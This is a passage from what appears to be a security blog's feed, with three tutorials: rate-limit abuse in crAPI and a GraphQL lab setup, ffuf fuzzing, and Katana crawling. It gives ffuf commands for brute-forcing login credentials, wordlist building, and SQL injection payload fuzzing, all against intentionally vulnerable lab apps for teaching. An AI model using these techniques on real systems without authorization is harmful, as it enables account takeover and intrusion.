Remember, the sea of cybersecurity is wide and deep, filled with both peril and promise. It&apos;s up to us, the navigators of this digital world, to chart a course toward a safer future. So, keep your compass true, your maps updated, and your curiosity alive. The next horizon is yours to explore.</content:encoded><author>Ruben Santos</author></item><item><title>API Safeguards: Mastering Rate Limiting and GraphQL Security</title><link>https://www.kayssel.com/post/hacking-apis-6</link><guid isPermaLink="true">https://www.kayssel.com/post/hacking-apis-6</guid><description>Exploring API security, this chapter covers rate limiting in REST APIs and dives into GraphQL vulnerabilities. It includes setting up a &quot;Damn Vulnerable GraphQL Application&quot; lab, testing with Altair, and emphasizes the importance of robust security measures in API design and testing.</description><pubDate>Sun, 17 Mar 2024 16:34:08 GMT</pubDate><content:encoded># Introduction

Welcome to a comprehensive journey through the intricacies of API security, focusing on rate limiting and GraphQL. In the digital realm, the balance between accessibility and security is paramount. This chapter embarks on an exploration of rate limiting within REST APIs—a critical mechanism for managing resource access and preventing abuse. As we progress, we pivot towards the dynamic world of GraphQL, uncovering its unique vulnerabilities and strengths. Through practical examples and hands-on exercises, including the setup of a &quot;Damn Vulnerable GraphQL Application&quot; lab and testing with the Altair client, we aim to deepen your understanding of these technologies. Our journey is designed to arm you with the knowledge and skills necessary to navigate the challenges of API security, ensuring you&apos;re well-equipped to protect your digital assets in an ever-evolving landscape.

### Main Content Highlights

-   **Rate Limiting in REST APIs**: We delve into the necessity of rate limiting as a safeguard against overuse and abuse, ensuring APIs remain efficient and secure.
-   **Proof of Concept with crAPI**: A real-world example illustrates the consequences of inadequate rate limiting, highlighting the potential for denial of service attacks.
-   **Bridging REST and GraphQL**: Transitioning from REST API vulnerabilities to the exploration of GraphQL, we set the stage for a deeper dive into this flexible query language.
-   **Deep Dive into GraphQL**: An overview of GraphQL&apos;s main components—queries, mutations, subscriptions, schema, and resolvers—lays the groundwork for understanding its operational dynamics.
-   **Creating a Laboratory**: Setting up a hands-on lab with &quot;Damn Vulnerable GraphQL Application&quot; provides a practical context for vulnerability exploration.
-   **Choosing a GraphQL Client**: The selection of Altair as a feature-rich client emphasizes the importance of effective tools in vulnerability testing.
-   **Testing the GraphQL Client**: Demonstrating the testing process with graphw00f and introspection queries, we validate the functionality of our GraphQL setup.

# **Understanding Rate Limiting**

In the digital world, as we strive to create applications that are not only efficient but also secure, understanding the concept of rate limiting becomes crucial, especially when dealing with REST APIs. Rate limiting is a protective measure that API developers implement to control the amount of incoming requests a user can make within a specified timeframe. This mechanism serves as a gatekeeper, ensuring that the API&apos;s resources are used in a fair and efficient manner, preventing overuse and potential abuse.

Why is rate limiting so important? Imagine a scenario where an API is left unchecked, open to an unlimited number of requests. This could lead to a variety of issues, including server overload, degraded service performance for other users, and an increased vulnerability to DDoS attacks, where malicious actors attempt to bring down a service by flooding it with high volumes of traffic.

By implementing rate limiting, API providers can specify thresholds, such as a certain number of requests per minute or hour for each user. If these thresholds are exceeded, the API can temporarily block further requests from the offending user, thereby mitigating the risk of overuse and ensuring a more stable and reliable service for all users.

In essence, rate limiting acts as a critical safeguard in the REST API ecosystem, balancing the need for open access with the imperative of maintaining service integrity and security. It&apos;s a testament to the thoughtful design and management of digital resources in an ever-connected world.

## **Real-World Example: Rate Limiting Gone Wrong in crAPI**

Now that we understand what rate limiting is, let&apos;s dive into a real-world example that showcases a flawed implementation of this concept in an API. Our focus will be on the crAPI, particularly a feature we haven&apos;t explored yet: contacting a mechanic through the application dashboard.

![](/content/images/2024/03/image-21.png)

Mechanic contact section

In this section of crAPI, users are prompted to fill in details such as the mechanic&apos;s information and a description of their issue. This process seems straightforward, but when we examine the backend request using tools like Burp Suite, we uncover something intriguing.

![](/content/images/2024/03/image-22.png)

Form to write to the mechanic

![](/content/images/2024/03/image-23.png)

Successful registration

Among the parameters, two catch our eye: `repeat_request_if_failed`, which defaults to `False`, and `number_of_repeats`. The names suggest these parameters control the repetition of requests, potentially without limits. By toggling `repeat_request_if_failed` to `True` and setting a high `number_of_repeats`, we inadvertently trigger a denial of service (DoS) by overwhelming the system with repeated requests, thereby highlighting a critical absence of rate limiting.

![](/content/images/2024/03/image-24.png)

Form requests

![](/content/images/2024/03/image-25.png)

Change form values

In the vast landscape of the real world, such vulnerabilities may not always be blatantly apparent. Often, the problematic parameter might be buried among countless others, making it a needle in a digital haystack. Yet, the lesson here is clear: if you ever suspect an application could be susceptible to such misuse, it&apos;s imperative to report it. Conducting denial of service tests without caution can lead to severe financial repercussions for the client. This scenario underlines the importance of implementing robust rate limiting to safeguard against unintended service disruptions, ensuring the API remains resilient under various conditions.

# **Bridging Our Discussion from REST API Rate Limiting to GraphQL**

In the previous section, we delved into the crucial concept of rate limiting within REST APIs—an essential safeguard against overuse and abuse, ensuring the APIs remain efficient and secure. This exploration not only highlighted the importance of managing access to our digital resources but also set the stage for our next venture into the realm of GraphQL.

# **A Comprehensive Overview of GraphQL**

In today’s episode, we delve deeper into the world of GraphQL, a powerful query language for APIs, and a runtime for executing those queries by using a type system you define for your data. Unlike traditional REST APIs, which can be limited by rate limiting strategies as discussed, GraphQL offers a more flexible and efficient approach to data retrieval and manipulation. It isn&apos;t tied to any specific database or storage engine and is instead backed by your existing code and data.

GraphQL revolutionizes client-server interactions by allowing clients to request exactly what they need, thus avoiding the over-fetching and under-fetching issues commonly associated with REST APIs. This makes GraphQL an efficient alternative, designed to make APIs faster, more adaptable, and more developer-friendly.

The main components of GraphQL include:

1.  **Queries**: The request made to a GraphQL server. Unlike REST, where you would use different endpoints to get various data, with GraphQL, you use a single endpoint but specify what you want in the query.
2.  **Mutations**: These are how you modify data in the system. Think of them as the POST, PUT, DELETE methods in a REST API, but again, with more specificity and control over what is returned after the operation.
3.  **Subscriptions**: A powerful feature that allows clients to subscribe to real-time updates from the server.
4.  **Schema**: The heart of any GraphQL setup, defining what queries, mutations, and subscriptions can be made, what types of objects are returned, and how they are interconnected.
5.  **Resolvers**: The functions that are responsible for fetching the data for each field in the schema.

In [Chapter 1](https://www.kayssel.com/post/api-hacking-1/), we laid the groundwork by covering the basics of GraphQL and how to perform reconnaissance on this type of architecture in a web penetration testing scenario. We also discussed the primary tools utilized in the process, providing you with a solid foundation to start exploring GraphQL vulnerabilities.

Moving forward, our focus will shift more towards identifying and exploiting vulnerabilities specific to GraphQL APIs. We’ll cover common security pitfalls, how to mitigate them, and advanced techniques to ensure your or your client&apos;s APIs are secure. Stay tuned for an in-depth exploration of these critical aspects in our upcoming chapters.

# **Setting Up the Laboratory: Damn Vulnerable GraphQL Application**

As part of our journey to master GraphQL, and continuing the practice we&apos;ve established throughout this series, we&apos;re going to set up a hands-on lab environment. For this purpose, we&apos;ll be utilizing an application known as &quot;Damn Vulnerable GraphQL Application,&quot; or DVGA for short. To get our lab up and running, we&apos;ll leverage Docker for installation:

```bash
git clone https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application.git &amp;&amp; cd Damn-Vulnerable-GraphQL-Application

docker build -t dvga .

docker run -d -t -p 5013:5013 -e WEB_HOST=0.0.0.0 --name dvga dvga

```

After installation, you&apos;ll be able to access the application&apos;s interface seamlessly.

![](/content/images/2024/03/image-20.png)

DVGA

With that, our lab is all set for practice. Similar to our approach with REST APIs, here we&apos;ll focus specifically on GraphQL vulnerabilities. However, we won&apos;t cover traditional web hacking vulnerabilities like SQL injection or command injection, to name a few.

# **Selecting a GraphQL Client: The Case for Altair**

When diving into the exploration of GraphQL vulnerabilities, having a powerful and user-friendly client can significantly enhance the learning and testing process. Among the plethora of GraphQL clients available, we&apos;ve chosen to focus on Altair, renowned for its comprehensive feature set and widespread use within the community.

Altair stands out as a visually appealing and feature-rich GraphQL client, designed to cater to a wide array of platforms. Its intuitive interface and robust functionality make it an ideal choice for both beginners and experienced users alike, facilitating the exploration of GraphQL queries, mutations, and subscriptions with ease.

To get started with Altair, I highly recommend visiting the official GitHub page for the most direct installation process:

[GitHub - altair-graphql/altair: ✨⚡️ A beautiful feature-rich GraphQL Client for all platforms.](https://github.com/altair-graphql/altair)

Although I typically prefer using terminal-based tools for their simplicity and efficiency, I must admit that, in the realm of GraphQL clients, none have fully met my expectations so far. However, this is a personal preference, and the landscape is vast and ever-evolving. Should you come across a terminal-based GraphQL client that captures your interest, I&apos;m all ears! Meanwhile, rest assured that such tools do exist, and a bit of exploration on GitHub might uncover a hidden gem perfectly suited to your preferences. Whether you&apos;re a fan of GUI or command-line interfaces, the key is to find a tool that complements your workflow and enhances your exploration of GraphQL vulnerabilities.

## **Hands-On Testing: Unveiling GraphQL with Altair**

To begin testing our GraphQL client, our first step is to identify and load the GraphQL endpoint. [For this purpose, we often turn to tools like](https://www.kayssel.com/post/api-hacking-1/#detecting-graphql-the-tools-of-the-trade) `graphw00f`, which are designed to detect GraphQL APIs efficiently. Once we&apos;ve pinpointed the endpoint, we&apos;ll proceed by inputting it into the designated query section of our client.

Upon executing a preliminary query, you might notice that it doesn&apos;t produce any immediate results. This isn&apos;t a cause for concern. At this juncture, a smart move is to perform an introspection query. This special type of query allows us to peek under the hood of the GraphQL API, providing insights into its schema and the types of operations it supports.

![](/content/images/2024/03/image-27.png)

Request to GraphQL endpoint

As illustrated in the image below, the successful return of detailed schema information through an [introspection query](https://www.kayssel.com/post/api-hacking-1/#introspection-query-unveiling-the-depths-of-graphql) confirms that our client is in good working order. This not only reassures us of the client&apos;s functionality but also equips us with valuable knowledge about the API&apos;s structure, paving the way for more effective and informed testing or development going forward.

![](/content/images/2024/03/image-26.png)

Request with introspection

# Conclusions

Throughout this chapter, we&apos;ve navigated the critical aspects of API security from rate limiting in REST APIs to the vulnerabilities and testing methodologies of GraphQL. The journey from understanding the basic protections against API abuse to hands-on testing with GraphQL underscores the complexity and importance of robust security measures. The practical setup of a vulnerable GraphQL environment and the exploration with Altair have equipped you with a hands-on understanding of how to identify and exploit common vulnerabilities.

As we conclude, remember that the landscape of API security is continuously evolving. The principles and practices discussed here lay a foundation for vigilance and ongoing education in protecting APIs against emerging threats. Whether you&apos;re developing new applications or securing existing ones, the insights from this chapter are crucial for anyone looking to enhance their security posture in the digital age. Armed with this knowledge, you&apos;re better prepared to face the challenges of API security, ensuring the integrity and reliability of your digital services in an interconnected world.

# Resources

[GitHub - dolevf/Damn-Vulnerable-GraphQL-Application: Damn Vulnerable GraphQL Application is an intentionally vulnerable implementation of Facebook’s GraphQL technology, to learn and practice GraphQL Security.](https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application)</content:encoded><author>Ruben Santos</author></item><item><title>The Art of Fuzzing: Navigating Web Security with Advanced Testing Strategies</title><link>https://www.kayssel.com/post/hacking-web-3</link><guid isPermaLink="true">https://www.kayssel.com/post/hacking-web-3</guid><description>Explore fuzzing in web pen testing, from uncovering directories to attacking login portals and finding vulnerabilities, utilizing tools like ffuf.</description><pubDate>Sun, 10 Mar 2024 12:25:22 GMT</pubDate><content:encoded># Introduction

In the dynamic landscape of web security, penetration testers are constantly seeking innovative approaches to uncover vulnerabilities that could be exploited by malicious actors. Fuzzing emerges as a critical technique in this endeavor, offering a systematic method to test the resilience of web applications against unexpected or malformed inputs. This chapter delves into the art and science of fuzzing, exploring its application in discovering directories, attacking login portals, and identifying potential vulnerabilities. By leveraging tools such as ffuf, Dirbuster, and Wfuzz, testers can simulate a wide range of attack scenarios, uncovering flaws that would otherwise remain hidden. As we navigate through these sections, we&apos;ll provide insights into effective fuzzing strategies, illustrating how they can be employed to enhance the security posture of web applications. The journey through fuzzing is not just about finding weaknesses; it&apos;s about fortifying defenses, ensuring that applications can withstand the myriad threats that pervade the digital world.

# **Expanding Your Web Penetration Testing Methodology**

In this chapter, we&apos;ll refine your penetration testing methodology by integrating three essential techniques:

1.  **Directory Fuzzing:** Uncover hidden paths to sensitive data accessible without page authentication. This technique often reveals overlooked resources, such as .git repositories, that could pose significant security risks.
2.  **Login Portal Fuzzing:** Assess the security of authentication mechanisms within login portals. By systematically testing these gateways, we can determine their resilience against unauthorized access attempts.
3.  **Parameter Fuzzing:** Identify vulnerabilities within application parameters. This approach lays the groundwork for advanced automated testing methods we&apos;ll explore in upcoming discussions.

# Understanding Fuzzing in Web Penetration Testing

Fuzzing stands as a pivotal technique within web penetration testing, aimed at identifying security vulnerabilities, detecting anomalous behaviors, or eliciting unexpected responses from applications. This method entails bombarding an application with a vast array of random data (&quot;fuzz&quot;) to trigger errors, crashes, or reveal security loopholes. Such a strategy is instrumental in highlighting potential frailties across various application components, including input fields, APIs, and backend mechanisms, which could be susceptible to exploitation by malicious entities.

The automation of vulnerability discovery through fuzzing offers a significant advantage in web penetration testing, streamlining the process to efficiently uncover issues like buffer overflows, injection vulnerabilities, and improper input handling.

A suite of specialized tools facilitates fuzzing efforts in web penetration contexts, distinguished by their respective focuses and capabilities:

-   [**ffuf (Fuzz Faster U Fool):**](https://github.com/ffuf/ffuf) A go-to web fuzzer for its rapid performance in unearthing web application elements and content, primarily utilized for directory and file discovery yet adaptable for a wide array of fuzzing tasks.
-   [**Dirbuster:**](https://www.kali.org/tools/dirbuster/) A java-based utility favored for its proficiency in identifying hidden files and directories on a web server, leveraging a list-based approach to systematically explore web application structures.
-   [**Wfuzz**](https://github.com/xmendez/wfuzz)**:** Offers a comprehensive fuzzing solution tailored for web applications, supporting a myriad of scenarios from directory discovery to session hijacking and parameter fuzzing. Its extensive feature set and modular architecture make it adaptable to a wide variety of testing requirements.

In this chapter, we will explore the primary applications of fuzzing, with a special emphasis on using ffuf for our demonstrations. Its ability to adapt to various fuzzing scenarios makes **ffuf** an excellent choice for those looking to comprehensively test the security of web applications.

# **Directory Discovery Through Fuzzing**

Fuzzing techniques serve various purposes in an audit, with one common application being the discovery of accessible directories within an application. To achieve this, a basic command using ffuf might look like this:

```bash
ffuf -u &lt;url&gt; -w &lt;wordlist&gt;

```

![](/content/images/2024/03/image-1.png)

Fuzzing directories with ffuf

It&apos;s crucial to insert the term &quot;FUZZ&quot; at the location where the list of potential entries is to be passed. At this stage, the sheer volume of results can be overwhelming, making it challenging to discern the relevant findings. This is where filters come into play. FFUF provides an array of filters, from response status to regular expressions, as well as &quot;matchers.&quot; Unlike filters, matchers pinpoint exactly what we&apos;re searching for. For instance, if seeking a specific word in the response, you could utilize `-mr &quot;word&quot;`. Experimenting with these tools can help you identify the most effective ones for your needs.

![](/content/images/2024/03/image-2.png)

Filter options and matchers

In my experience, employing a response size filter (-fs) has been effective in refining the results, making the potential directories more apparent, as illustrated below. The next step involves examining these directories individually and continuing the fuzzing process to uncover potentially interesting findings that shouldn&apos;t be accessible at first glance.

![](/content/images/2024/03/image.png)

Filtering by request size

The image demonstrates the use of a dirbuster list, a common choice in CTF (Capture The Flag) scenarios due to its reliability in yielding fruitful outcomes. However, in real-world applications, selecting a wordlist tailored to the technology employed by the application can lead to significantly better results. Numerous wordlists are available in GitHub repositories, but I&apos;d like to highlight two in particular that have proven exceptionally useful in my offensive security endeavors. First among these is the Assetnote lists:

[Assetnote Wordlists](https://wordlists.assetnote.io/)

The second noteworthy resource originates from the creator of reconftw, a tool designed for automating penetration testing in web applications. The wordlists available in this repository are exceptionally valuable due to their broad applicability, often delivering impressive results:

[GitHub - six2dez/OneListForAll: Rockyou for web fuzzing](https://github.com/six2dez/OneListForAll)

Leveraging the Dirbuster list, Assetnote&apos;s technology-specific lists, and the OneListForAll from the creator of reconftw equips you with a comprehensive toolkit for web application security testing. These curated resources significantly enhance the effectiveness of your fuzzing efforts, allowing for more precise and targeted audits.

# **Attacking Login Portals with Fuzzing Techniques**

Fuzzing is not only useful for discovering directories but also plays a crucial role in authentication testing, particularly with password recovery and login portals. For those who use Burp Suite but do not have access to its Pro version, fuzzing can offer a faster alternative for conducting these tests.

The process begins by obtaining the request in raw format, which can be captured using a proxy tool like mitmproxy, ZAP, or Burp Suite. Capturing this request is a preliminary step towards preparing for fuzzing, which involves replacing the &quot;password&quot; parameter with the placeholder &quot;FUZZ&quot;.

![](/content/images/2024/03/image-3.png)

Capturing request with mitmproxy

![](/content/images/2024/03/image-12.png)

Request in raw format in text file

For a penetration test, the goal often includes verifying the application&apos;s resilience against brute force attacks. To this end, a concise list—say, of 11 words—may suffice, ensuring that the actual password is included to demonstrate the application&apos;s vulnerability when it fails to block the attack.

![](/content/images/2024/03/image-5.png)

List of words to test brute force attacks

To conduct a brute force attack on login portals, the following command is used, emphasizing the importance of specifying a proxy to log the requests made to the application:

```bash
ffuf -request fuzzing_login.txt -request-proto http -replay-proxy http://0.0.0.0:8888 -w passwords.txt | tee results.txt

```

This command utilizes a prepared text file (e.g., `fuzzing_login.txt`) containing the captured request, with &quot;FUZZ&quot; placed in the password field. The `-w` flag specifies the wordlist for passwords, while the `-replay-proxy` option logs the requests. A successful attack is indicated by server responses that confirm the absence of user blocking or other brute force prevention mechanisms, showcasing the application&apos;s vulnerability.

![](/content/images/2024/03/image-8.png)

Successful brute force attack

![](/content/images/2024/03/image-11.png)

Attempt made with many more words to verify vulnerability

If we now go to our proxy, we can investigate the successful request and see how the response returns the JWT to start interacting with the web application.

![](/content/images/2024/03/image-9.png)

Vulnerable request

![](/content/images/2024/03/image-10.png)

Vulnerable response

In scenarios where brute-force mechanisms are effectively countered, the response from a web application to a successful password guess would be indistinguishable from that of a failed attempt. This uniform response pattern could signal the presence of anti-brute-force measures, such as user account lockouts after several incorrect attempts or the implementation of a second authentication factor. Such measures would make it challenging to determine whether the correct password has been identified, serving as an indicator of the application&apos;s robust defense against brute-force attacks.

On the other hand, the same methodology can be adapted for various purposes, such as user registration, ID verification to uncover authorization issues, and more. If the application is found to be vulnerable to brute force attacks, extending the attack to include usernames can be beneficial. The following resource offers wordlists for creating statistically likely usernames, which can be customized to include domain-specific details for a more effective attack:

[GitHub - insidetrust/statistically-likely-usernames: Wordlists for creating statistically likely username lists for use in password attacks and security testing](https://github.com/insidetrust/statistically-likely-usernames)

This command appends &quot;@gmail.com&quot; to each entry in a username list, enhancing the list&apos;s relevance for targeted attacks.

```bash
sed -i &apos;s/$/@gmail.com/&apos; john.txt

```

For comprehensive brute force attacks involving both usernames and passwords, the command below can be employed, with the `-w` flag used twice to specify separate wordlists for passwords and usernames:

```bash
ffuf -request fuzzing_login.txt -request-proto http -replay-proxy http://0.0.0.0:8888 -w passwords.txt:PASS -w users.txt:USER | tee results.txt

```

![](/content/images/2024/03/image-15.png)

Specify list to be used in each parameter

Successful attempts are typically indicated by an HTTP status code 200 found in a file where ffuf has stored its results, revealing the effectiveness of the brute force strategy. This approach underscores the importance of selecting appropriate wordlists and fine-tuning fuzzing parameters to effectively expose security vulnerabilities within web applications.

![](/content/images/2024/03/image-13.png)

Use of grep to find the searched combination

![](/content/images/2024/03/image-14.png)

Differentiate good result

Alternatively, using filters, we could directly identify successful results within the ffuf output, streamlining the process of pinpointing the effectiveness of our brute force strategy.

![](/content/images/2024/03/image-16.png)

Brute-Force attack, combining user and password list with filter

# **Vulnerability Discovery via Fuzzing**

The versatility of fuzzing tools like ffuf extends to uncovering anomalous behavior or vulnerabilities within application parameters. A practical application of this is to assess potential SQL injection vulnerabilities, as demonstrated in the Juice Shop login portal scenario. A critical component of this process is utilizing a well-constructed list of SQL injection payloads. For such purposes, the PortSwigger list comes highly recommended:

[sql-injection-payload-list/Intruder/detect/Generic\_ErrorBased.txt at master · payloadbox/sql-injection-payload-list](https://github.com/payloadbox/sql-injection-payload-list/blob/master/Intruder/detect/Generic_ErrorBased.txt)

The procedure begins with capturing a raw request through a proxy and inserting the keyword &quot;FUZZ&quot; into a designated parameter to signal it as the target for fuzzing.

![](/content/images/2024/03/image-17.png)

Request in raw format

The final step involves running the tool alongside our proxy to intercept and log all outgoing requests, enabling a detailed examination of the responses:

```bash
 ffuf -request sqli_fuzzing.txt -request-proto http -replay-proxy http://0.0.0.0:8888 -w sqli -od sqli_fuzzing_results

```

With specific payloads, a status 500 error may surface. Delving into the responses of these requests can reveal SQL errors along with the queries executed by the application, thereby confirming the presence of a SQL injection vulnerability.

![](/content/images/2024/03/image-18.png)

Mitmproxy request history

![](/content/images/2024/03/image-19.png)

Response showing vulnerable behavior

This technique can be applied to various requests for comprehensive vulnerability assessment. In forthcoming chapters, we&apos;ll explore tools specifically designed to identify vulnerabilities, showcasing how back fuzzing is utilized to detect them effectively.

# Conclusion

As we conclude this exploration of fuzzing within web penetration testing, it&apos;s clear that this technique is invaluable for security professionals. Through the strategic application of fuzzing, we&apos;ve seen how it&apos;s possible to unearth directories, breach login portals, and discover vulnerabilities that could compromise an application&apos;s integrity. Tools like Ffuf have proven to be indispensable allies in this quest, enabling testers to conduct comprehensive and effective security assessments. However, the journey doesn&apos;t end here. The ever-evolving nature of web technologies and threat landscapes demands continuous learning and adaptation. As you apply the knowledge and strategies discussed in this chapter, remember that the ultimate goal is to stay one step ahead of potential threats, safeguarding your applications against the unforeseen challenges of tomorrow. Fuzzing, with its capacity to simulate a wide array of attack vectors, remains a critical component of any robust security testing toolkit, ensuring that the digital fortresses we build can withstand the onslaughts they face.

# Resources

[Everything you need to know about FFUF](https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html)</content:encoded><author>Ruben Santos</author></item><item><title>Katana in Action: Enhancing Security Audits Through Effective Web Crawling</title><link>https://www.kayssel.com/post/hacking-web-2</link><guid isPermaLink="true">https://www.kayssel.com/post/hacking-web-2</guid><description>Explore advanced crawling techniques for web security audits, focusing on tools like Katana and proxies to uncover hidden vulnerabilities and secure web applications effectively.</description><pubDate>Sun, 03 Mar 2024 12:32:04 GMT</pubDate><content:encoded># Introduction

Welcome to a vital chapter in our series on enhancing web application security through advanced crawling techniques. This installment is dedicated to empowering auditors with the knowledge and tools necessary to uncover the hidden depths of web applications. By leveraging the powerful capabilities of Katana and exploring strategic methodologies, readers will gain insights into navigating the complex landscape of software vulnerabilities, TLS/SSL configurations, security headers, and application crawling. This chapter not only outlines the initial steps typically undertaken in security audits but also introduces advanced options for a more thorough examination, promising a significant advantage in the quest for comprehensive security assessments.

# Methodology Overview

As we navigate through the various chapters of this series, I&apos;ll highlight a structured series of checks to incorporate into your audits. This approach is designed to streamline your testing process and ensure comprehensive coverage of critical security areas. For today&apos;s installment, I recommend focusing on the following key areas:

1.  **Look at Vulnerabilities in Used Software**: It&apos;s essential to start by identifying and assessing the software your application relies on. This includes libraries, frameworks, and any third-party tools. Understanding the vulnerabilities in these components can provide early insights into potential security risks.
2.  **Check TLS/SSL Settings**: The configuration of TLS/SSL protocols plays a critical role in securing data in transit. Evaluating these settings ensures that your application is using strong encryption standards and is protected against eavesdropping and man-in-the-middle attacks.
3.  **Configuration of Security Headers**: Security headers are a fundamental aspect of web application security. They instruct browsers on how to handle your content safely, preventing a range of attacks. Ensuring these are correctly configured adds another layer of security.
4.  **Application Crawling**: Lastly, a thorough crawl of your application is indispensable. It helps map out the application&apos;s structure, revealing the full scope of what needs to be tested. This includes identifying hidden endpoints and resources that could be potential targets for attackers.

# Essential Firefox Setup

To kick things off, we&apos;re going to set up Firefox for performing audits. You&apos;re welcome to use another Chromium-based browser, but it&apos;s worth noting that one of the plugins we&apos;ll be discussing isn&apos;t available for those browsers just yet.

First up, and most importantly, is [FoxyProxy](https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/?utm_source=addons.mozilla.org&amp;utm_medium=referral&amp;utm_content=search). This plugin is crucial for configuring the proxies we&apos;ll be utilizing. We&apos;ll dive deeper into its functionality and how it operates in upcoming chapters.

Next on the list is [Firefox Containers.](https://addons.mozilla.org/en-US/firefox/addon/multi-account-containers/?utm_source=addons.mozilla.org&amp;utm_medium=referral&amp;utm_content=search) This handy plugin makes conducting various authentication and authorization tests a breeze. Essentially, it lets you keep multiple tabs open, each with cookies from different users, facilitating privilege and access control testing. If you&apos;re curious to see it in action, [I&apos;ve used it in an article which you might find insightful](https://www.kayssel.com/post/bola-and-bfla/).

Last but not least, we have [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/?utm_source=addons.mozilla.org&amp;utm_medium=referral&amp;utm_content=search). This tool is invaluable for quickly identifying the software versions a website is running. While it might not be the star of the show during this series, in real-life scenarios, pinpointing software with known vulnerabilities is absolutely critical.

![](/content/images/2024/02/image-28.png)

Required plugins

Installing these plugins is a straightforward process, similar to adding any other plugin to Firefox. Just search for them in the Firefox Add-ons Store and click install. It&apos;s as simple as that!

![](/content/images/2024/02/image-36.png)

Search in the Firefox store

![](/content/images/2024/02/image-37.png)

Add a plugin

# Technological Reconnaissance

The first thing we will do, will be to take a look at the software used and as we can see the main thing we have to look at is that it uses angular, jquery and core-js. This will condition certain processes that are usually done during an audit and that we will see during the series as well as in this chapter. On the other hand, in a conventional pentest, we will look for each software version and try to see if they contain public vulnerabilities.

![](/content/images/2024/02/image-38.png)

Technologies used detected with wappalyzer

In this case, as we can see, only jQuery contains vulnerabilities. We will have to indicate this to the client as a new vulnerability. It should be noted that we do not need to exploit it as such, simply indicating it as detected in the report would be enough (to find the details just google software and its corresponding version).

![](/content/images/2024/02/image-39.png)

Angular without vulnerabilities

![](/content/images/2024/02/image-40.png)

Jquery with vulnerabilities

![](/content/images/2024/02/image-41.png)

Core-js with vulnerabilities

# Core Security Checks

In addition to the challenge of keeping software libraries up to date, two critical aspects are commonly scrutinized during web application audits:

1.  **TLS/SSL Certificates:** It&apos;s essential to ensure that the security protocols safeguarding data transmission are robust and functioning correctly. For this purpose, we often turn to a tool called [testssl](https://github.com/drwetter/testssl.sh). This utility automates the evaluation process, meticulously checking the application&apos;s adherence to these security protocols. By using `testssl`, we aim to provide our clients with peace of mind, confirming that their data encryption standards meet current security benchmarks.
2.  **Security Headers:** Another key area of focus is the configuration of security headers within the web application. These headers, such as `Strict-Transport-Security`, `X-Content-Security-Policy`, and others, play a pivotal role in fortifying the application against various vulnerabilities. They work by instructing the browser on how to behave when handling the site&apos;s content, significantly reducing the risk of security breaches. To assess the effectiveness of these security measures, we utilize a tool called [shcheck](https://github.com/santoru/shcheck). This tool scans the application&apos;s headers, providing a clear overview of its security posture and highlighting areas for improvement.

# The art of Application Crawling

After completing the initial checks, it&apos;s highly beneficial to perform a web crawl to discover the various types of links present on the webpage. This preliminary exploration is crucial as it lays the groundwork for further automating scanning processes or conducting vulnerability scans. By identifying the links and resources associated with the web application early on, we can streamline our approach to security assessments.

Crawling the web application serves as an initial survey, providing us with valuable insights into its structure and content. This step is crucial for mapping out the application&apos;s landscape, which, in turn, enables us to tailor our security testing strategies more effectively. The insights gained from this process help in automating subsequent scans, ensuring a thorough and efficient assessment.

This initial crawl is just the beginning. It will be complemented by a more detailed examination conducted through our proxy, allowing us to compile a comprehensive list of targets within the application&apos;s scope. Together, these methods ensure that no stone is left unturned in our quest to secure the web application.

There are numerous tools available for carrying out this process, each with its own set of features and capabilities. While you can explore a variety of these tools through [recommended links](https://github.com/vavkamil/awesome-bugbounty-tools?tab=readme-ov-file#Content-Discovery), I personally prefer using [&quot;katana&quot;](https://github.com/projectdiscovery/katana) from Project Discovery. Katana stands out due to its efficiency and the depth of analysis it offers, making it an invaluable asset in our security toolkit. In this article, we&apos;ll dive deeper into how Katana facilitates our web crawling objectives, highlighting its features and demonstrating its application in real-world scenarios.

## Leveraging Katana

With the groundwork laid and the importance of a detailed web crawl established, engaging Katana becomes our strategic move to unearth even more about our target&apos;s digital terrain. Let&apos;s initiate this journey with a simple command:

```bash
echo &lt;url&gt; | katana

```

![](/content/images/2024/02/image-23.png)

Normal katana execution

Utilizing Katana with its default settings offers a glimpse into the application&apos;s link structure, yet our ambition drives us to seek a comprehensive view. To encapsulate the breadth of potential vulnerabilities, we enhance our toolkit with specific flags that amplify our discovery process.

### **Enhancing Discovery with Headless Mode**

In the context of modern web applications, particularly Single Page Applications (SPA) that dynamically load content, the `-headless` flag becomes an indispensable tool in our arsenal. By activating this flag, we leverage the robust capabilities of the Chromium engine. This strategic move is crucial for applications like the one we&apos;re testing, where content is dynamically generated and traditional crawling methods fall short.

```bash
echo &lt;url&gt; | katana -headless

```

![](/content/images/2024/02/image-24.png)

We use the parameter headless

Utilizing Katana in headless mode allows us to simulate a real user&apos;s interaction with the application, bypassing the limitations that prevent standard crawlers from accessing dynamically loaded content. This command adjustment is transformative, unveiling a wealth of links that would otherwise remain concealed.

### **Maximizing Results with JavaScript Crawling**

Our quest for exhaustiveness leads us to the `-js-crawl` flag, enabling Katana to scrutinize JavaScript files for hidden links:

```bash
katana -headless -js-crawl

```

![](/content/images/2024/02/image-25.png)

Maximize encounters by looking in JavaScript files

This configuration is my standard for ensuring no potential link is overlooked, setting the stage for a detailed vulnerability assessment. After collecting a comprehensive set of data, I utilize `grep` to sift through the findings, focusing specifically on the links that align with our security assessment goals. This process of manual refinement is essential for isolating relevant vulnerabilities from the broader dataset, ensuring our efforts are as targeted and effective as possible. While Katana&apos;s capabilities extend beyond these commands, including options for targeted filtering and output customization, I encourage a dive into its official documentation to discover how best to tailor its use to your needs.

### **Diving Deeper: Advanced Options**

In addition to the foundational strategies we&apos;ve explored, there are several intriguing options worth considering to further refine our web crawling efforts. Among these, two advanced flags stand out for their potential to significantly deepen our exploration:

-   The `-d` flag offers the capability to adjust the crawl&apos;s depth, striking a perfect balance between thorough exploration and efficient time management. This adaptability is invaluable, allowing us to customize the depth of our crawl to meet the unique requirements of each security assessment and ensure a comprehensive exploration of the web application.
-   The `aff` flag, an experimental feature, aims to simulate user interactions, opening the door to discovering links that might remain hidden under normal circumstances. This approach can unveil vulnerabilities accessible only through specific user behaviors, providing a richer, more detailed perspective on the application&apos;s security landscape.

## **Authenticated Crawling**

